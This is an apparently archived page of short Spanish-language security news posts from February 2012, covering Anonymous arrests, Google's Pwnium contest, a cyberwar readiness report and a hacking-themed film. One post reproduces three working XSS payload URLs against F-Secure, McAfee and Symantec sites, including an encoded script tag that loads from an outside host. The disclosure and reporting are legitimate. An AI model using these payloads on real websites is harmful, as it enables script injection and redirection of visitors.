IV Encuesta Latinoamericana de Seguridad de la Información ACIS

febrero 29, 2012 § Deja un comentario

Ya se encuentra activa la IV Encuesta Latinoamericana de Seguridad de la Información cuyo objetivo contar con un instrumento para avanzar en el desarrollo de estadísticas sobre el tema en la región. La encuesta estará disponible hasta Abril 22 de 2012.

Además se puede descargar el documento con los resultados de la III Encuesta realizada durante 2011.

Fuente: ACIS

Anuncios

Detienen a (supuestos) #Anonymous argentinos por ataques a sitios web

febrero 29, 2012 § Deja un comentario

Operativo de Interpol en Europa y América latina. Hubo 40 allanamientos en 15 ciudades, donde apresaron a 25 personas. Son presuntos miembros de Anonymous. En el país capturaron a supuestos hackers en Capital, San Isidro, Tucumán y Córdoba (este último no fue hallado).

El megaoperativo que llevó más de ocho meses de investigación y abarcó cuatro países fue para intentar frenar a la mayor red de activistas informáticos del mundo, Anonymous.

Se cree que la red abarca a más de seis millones de usuarios en todo el planeta. Ayer, Interpol informó que había logrado dar con 25 de ellos. Según pudo saber Clarín, todos los argentinos eran mayores de edad, en el grupo había tanto hombres como mujeres y vivían en Capital Federal, San Isidro, Río Cuarto (Córdoba) y Tucumán.

La investigación, a la que Interpol denominó Exposure comenzó en junio de 2011. En total, se realizaron 40 operativos en 15 ciudades de España, Argentina, Chile y Colombia. Además de los detenidos, que tienen entre 17 y 40 años, Interpol se llevó 250 equipos informativos y teléfonos celulares. También dinero que, se cree, sirve para financiar las actividades de Anonymous.

A estos detenidos se los acusa de haber hackeado páginas oficiales del gobierno colombiano, en particular del Ministerio de Defensa.

En el caso de Chile se dieron a conocer algunos datos, pero según la información los acusados son simples usuarios de LOIC, un software que inunda automáticamente un servidor con paquetes y requerimientos. Dentro de Anonymous, esto podría ser considerado el nivel más simple de participación, que difícilmente constituye un delito importante. Habrá que esperar a ver si realmente pasará algo con esto, o si simplemente es un intento de “asustar” a Anonymous.

Con el hashtag ‘tAnGoDoWn’, el mensaje difundido en la red social confirmó el derribo del portal web de Interpol, que cuenta con operaciones en 188 países. El ataque tuvo una duración estimada de 30 minutos.

Fuente: Clarin

XSS en F-Secure, Mcafee y Symantec

febrero 29, 2012 § Deja un comentario

XSSed ha publicado tres XSS en los sitios web de las empresas F-Secure, Mcafee y Symantec. Las vulnerabilidades fueron reportadas por “Zeitjak” y “dick” en abril de 2011 pero estuvieron activas hasta enero de 2012, cuando XSSed las hizo públicas.

https://kb.f-secure.com/userSetSession.aspx?c=0&cpc=0&cid=0&t="><body+onload="document%2Ewrite(String.fromCharCode(60,115,99,114,105,112,116,47,115,114,99,61,104,116,116,112,58,47,47,122,46,108,46,116,111,62,60,47,115,99,114,105,112,116,62))"+

http://go.mcafee.com/activation.cfm?firewall_id="style="background-image:url('http://i.imgur.com/oHp8A.gif')"onfocus="document.write(String.fromCharCode(60)%2B'iframe src=http://xssed.com height=100%25width=100%25>'%2BString.fromCharCode(60)%2B'/iframe>'%2BString.fromCharCode(60)%2B'script>alert(/XSS/)'%2BString.fromCharCode(60)%2B'/script>')" foo="bar

https://fileconnect.symantec.com/licenselogin.jsp?localeStr=en_US";document.location="http://www.xssed.com";//

Tal y como predecían en XSSed, luego de hacerse público los errores, las tres empresas han solucionado rápidamente el problema.

Cristian de la Redacción de Segu-Info

Google entregará hasta un millón de dólares a quienes hackeen Chrome

febrero 29, 2012 § Deja un comentario

Google se ha comprometido a premiar con un total de hasta un millón de dólares a las personas que logren hackear su navegador Chrome en la conferencia de seguridad CanSecWest, la próxima semana.

Google premiará a los ganadores con premios de U$S60.000 (completo usando solo bugs de Chrome), U$S 40.000 (parcial usando al menos un bug en Chrome), y U$S20.000 (consolación a través de otras aplicaciones), dependiendo de la importancia de la hazaña en un navegador instalado sobre Windows 7. PAra ellos, los miembros del equipo de seguridad de la compañía han anunciado en su blog el concurso Pwnium (para diferenciarlo del clásico Pwn2Own de CanSecWest).

Fuente: Arstechnica

Trends 2012. La fusión definitiva de lo virtual y lo real

febrero 29, 2012 § Deja un comentario

Por: Bernardo Gutiérrez

En los últimos dos años llevo insistiendo mucho en el concepto de ciudad híbrida, en la fusión del ciberespacio y el territorio. De hecho, la cada vez más nombrada Web 3.0 se encamina a una mezcla de sensores de datos ubicuos, individuos conectados en el territorio y web semántica. También se está hablando de esta web squared , un cóctel de geolocalización, cloud computing y realidad aumentada. 2012 será el año de la consagración del mundo híbrido. Casi todas mis predicciones van en esa dirección. Dejaremos pronto de hablar de internautas y comenzaremos a hablar de ciudadanos, digitales y físicos al mismo tiempo.

1)Visualizaciones de big data. Se habla mucho de la inmensa producción de datos del nuevo mundo conectado, pero no tanto de las visualizaciones que se realizan para traducir semejante maremagnum de datos. La visualización de Mercamadrid desarrollada dentro del Visualizar del Media Lab Prado es buen ejemplo. Cada vez habrá más datos recopilados y traducidos visualmente gracias al crowd sourcing. Los mapas que elabora Eric Fisher, como el del uso de Flickr y Twitter en Estados Unidos serán tendencia. El experimento Tráfico libre del Diário de Pernambuco (Brasil), un mapa en tiempo real sobre el estado del tráfico en la ciudad de Recife elaborado con datos de los usuarios, es un buen ejemplo.

2)Nuevas superficies de medios. Los medios de comunicación impresos están perdiendo presencia física (papel) en el territorio. Como ya escribí en TICbeat, los medios irán encontrando nuevas superficies (pantallas, cristales, tickets de tren..) para reforzar esa presencia. El digital signage – visualización de información y tweets de usuarios en grandes pantallas – es otra tendencia. Las nuevas plataformas – principalmente los tablets – también irán adquiriendo fuerza. Otra forma de presencia en el territorio. Creo que algunas aplicaciones para tablets como Readitlater, que permiten que el usuario marque un contenido y lo almacene para leer después en el metro, por ejemplo, son otro nuevo e interesante camino.

3)Territorio escaneable. La relación de las personas y el territorio a través de smart phones va mucho más allá de la lectura comercial de códigos QR o de servicios como Shazam (reconocimiento de música). Google ha lanzado, por ejemplo, Google Goggles, una app de reconocimiento de imagen. Creo que aplicaciones como eafsnap (identifica especies de árboles a partir de foto de sus hojas o haciendo fotos de sus hojas) o WeBIRD (reconocimiento de pájaros a partir de trinos grabados) abren una senda interesante.

4)Interacciones en el territorio. 2011 fue el año de Instagr.am, la red social móvil fotográfica. También fueron (mini) tendencia algunas aplicaciones como Color, que permite geolocalizar fotos y compartirlas con personas próximas. Algunos proyectos como Skanz, que permite escanear un código QR con información personal de personas físicas, abren la puerta a relaciones de gente desconocida en festivales, bares o eventos. Por otro lado, los llamados “objetos sociales”, con capas de contenido creadas por los usuarios, inauguran una época de wikiespacio construido con narraciones colectivas.

5) Redes libres, tecnología libre. El cierre de Megaupload, los proyectos de ley PIPA y SOPA estadounidenses, la aprobación de la Ley Sinde-Wert en España, la censura de algunos contenidos en Facebook y la nueva postura de Twitter en cuanto a la posibilidad de borrar tweets marcan un antes y un después en la historia de Internet. El software libre será más tendencia todavía en 2012. Veremos la explosión de redes sociales desarrolladas con software libre, como N-1.cc (y todas las redes del proyecto Lorea) o Identi.ca (un clon libre de Twitter). Los movimientos ciudadanos como el 15M español o Occupy Wall Street serán referencia en el desarrollo de tecnología libre. Occupy ya anunció el lanzamiento de Global Square, una red libre para todos los ciudadanos del mundo. Al mismo tiempo, veremos surgir aplicaciones móviles de lectura de códigos, críticos con SOPA, Ley Sinde-Wert y/o empresas de dudosa ética.

Fuente: Trends TicBeat

Países preparados para la ciberguerra (o no)

febrero 29, 2012 § Deja un comentario

Con el desarrollo de Internet como infraestructura global para realizar negocios y como herramienta para la política, la seguridad cibernética se ha convertido en el centro de problemas de seguridad nacional e internacional.

En este informe Cybersecurity and Cyberwarfare – Preliminary Assessment of National Doctrine and Organization [PDF] desarrollado por CSIS se estudia el estado de 99 países, según sus gastos militares y su grado de conectividad a Internet, para determinar cómo se organizan para hacer frente a la seguridad cibernética.

El estudio toma fuentes abiertas para revisar las políticas de estado, y si tienen o planean la adquisición de capacidades defensivas y ofensivas cibernéticas. Si bien muchos estados mantienen en secreto la naturaleza de sus defensas y armas para la guerra, el informe muestra información general sobre el desarrollo de nuevas capacidades cibernéticas militares, en base a las fuentes consultadas.

En el informe se identifican 33 países y se incluye planificación y organización de su ejército para la ciberguerra. Estos países tienen muy avanzada su organización en lo que respecta a la doctrina militar y emplean a cientos o miles de personas para trabajar en la guerra cibernética. Los Elementos comunes en esta doctrina militar incluye actividades de reconocimiento, operaciones de recolección de información e interrupción de redes y servicios críticos del enemigo.

También se discuten sobre otros 36 países donde no hay debate público sobre el papel militar en el ciberespacio y en donde las agencias civiles responsables ​​de la seguridad interna, seguridad informática o la policía son los responsables de la seguridad cibernética. Este es el enfoque “tradicional” de la seguridad cibernética que se remonta a los ’90 y a la creación de un Equipo de Emergencia Nacional (CERT), la asignación de la responsabilidad a los ministerios de ciencia y a la creación de unidades especializadas dentro del país.

El informe coloca a Argentina, Brasil y Colombia en el primer grupo y a España en el segundo. Es paradójico la aparición de Argentina, sobre todo cuando en el país todavía ni siquiera se ha logrado que funcione en la práctica el CERT nacional (ArCERT ahora convertido en ICIC) y por lo tanto ni siquiera se podría clasificar al país dentro del segundo grupo. Las fuentes abiertas consultadas para llegar a esa conclusión han sido un informe del Dr Javier Ulises Ortiz del año 2008 y el organigrama del Estado Mayor Conjunto de las FF.AA.

Cristian de la Redacción de Segu-Info

Reboot, una película que incluye un wargame

febrero 28, 2012 § 1 comentario

Me acabo de enterar de la existencia de un corto de 34 min. llamado Reboot (@reboot_film)con una trama bastante orientada a la seguridad informática y la cultura cyberpunk, con una trama bastante intrigante y un tráiler que despierta muchas emociones entre las personas que trabajamos en seguridad.


Reboot Trailer from Joe Kawasaki on Vimeo.
Mientras miraba el tráiler varias cosas me llamaron la atención y las empecé a comentar con @Banchiero y @DariooAM algunos errores que encontrábamos como el uso de cmd en entorno *nix, el exploit algo viejo que utilizaban en algunas escenas y en el minuto 1:17 me dio curiosidad por el código QR que traía el protagonista, me dio por tratar de aclarar la imagen y leer el código y entonces todo cambió.

El código QR apuntaba a la pagina http://rebootfilm.com/manifesto en ella encontraríamos un código en binario, y nos dimos cuenta que realmente no se trataban de “huevos de pascua” como pensábamos, sino que había todo una serie de retos con distintos niveles para jugar, mas tarde revisando de nuevo el video en el minuto 1:05 se encontró otra pista http://rebootfilm.com/a78525551f5dadb9b1c68e2f889a4411 (hacking is an art, the only limitation being your mind and creativity, prove you see things other don’t) que nos llevaría a mas contenidos ocultos http://rebootfilm.com/path2 “look closer, within a fraction, there lies a path”, entre otras cosas.

La invitación entonces es primero que todo a ver esta película que la verdad promete ser bastante buena, almenos para los interesados en estos temas de la seguridad informática, pero también a descubrir lo que los pequeños acertijos que los creadores de esta película han dejado ahí para nuestra diversión.

Puedes aportar mas pistas, errores o cosas curiosas de la película en los comentarios, te recomendamos seguir la cuenta en twitter de la película ya que constantemente te darán pistas.

Fuente: DragonJAR

¿Dónde estoy?

Actualmente estás viendo los archivos para febrero, 2012 en Seguridad Informática.